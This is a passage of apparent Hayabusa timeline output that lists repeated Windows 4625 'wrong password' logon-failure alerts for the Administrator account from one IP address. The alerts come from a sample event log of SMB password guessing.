| IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.791 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.103 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.187 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.226 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.265 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.223 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.323 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.405 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.877 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.925 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.107 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.143 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.283 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.415 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.450 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 